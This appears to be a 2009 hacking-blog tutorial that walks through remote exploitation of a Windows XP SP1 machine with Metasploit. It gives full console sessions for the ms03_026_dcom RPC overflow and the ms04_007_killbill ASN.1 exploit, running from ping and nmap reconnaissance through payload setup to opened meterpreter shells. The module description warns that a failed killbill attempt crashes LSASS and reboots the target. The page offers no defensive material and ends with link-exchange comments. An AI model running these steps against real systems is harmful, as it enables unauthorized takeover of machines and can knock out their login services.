Linux / Windows Metasploit POC
LINUX ENVIRONMENT
This is an old exploit, but it still works; I have tested it on a local area network. Here the exploit is run against Windows XP Service Pack 1.

[o] DCOM RPC Exploit (ms03_026_dcom)

# Description
This module exploits a stack overflow in the RPCSS service. This vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)

root@ubuntu:~# ping 172.16.1.31
PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.
64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms
64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms
64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms
^C
--- 172.16.1.31 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms

root@ubuntu:~# nmap -O -PN 172.16.1.31

Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT
Interesting ports on ******-******.kapukvalley.net (172.16.1.31):
Not shown: 1710 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
5000/tcp open  upnp
MAC Address: 00:1C:F0:5A:98:AF (D-Link)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds

root@ubuntu:~# cd /home/noge/pentest/metasploit/
root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole

       =[ msf v3.3-dev
+ -- --=[ 378 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 154 aux

msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms03_026_dcom) > set TARGET 0
TARGET => 0
msf exploit(ms03_026_dcom) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  172.16.1.31      yes       The target address
   RPORT  135              yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     172.16.1.31      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > exploit

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] The DCERPC service did not reply to our request
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > sysinfo
Computer: ******-******
OS      : Windows XP (Build 2600, Service Pack 1).
meterpreter >

=============================================================================================

[o] KILLBILL SMB Exploit (ms04_007_killbill)

# Description
This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to log in through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads; however, a few problems were encountered when using the equivalent bind payloads. Your mileage may vary.

msf > use windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_007_killbill) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms04_007_killbill) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST  172.16.1.31      yes       The target address
   RPORT  445              yes       Set the SMB service port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     172.16.1.31      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > exploit

[*] Started bind handler
[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)

meterpreter > sysinfo
Computer: ******-******
OS      : Windows XP (Build 2600, Service Pack 1).
meterpreter >
====================== [EOF] =======================
WINDOWS ENVIRONMENT
This is a video tutorial about how to use the Metasploit GUI on Windows. The target is still the same as in the Linux version above, and the exploit used is RPC DCOM. Hopefully you like it.. :)
Download the video here: http://www.4shared.com/file/115376922/9f3a5229/metasploit_dcom.html
Article Tutorial From: Noge / Evilc0de

The new Metasploit is better, btw thanks for the enlightenment.
It was very interesting to read http://www.binushacker.net
I want to quote your post on my blog. Can I?
And have you got an account on Twitter?
I would like to exchange links with your site http://www.binushacker.net
Is this possible?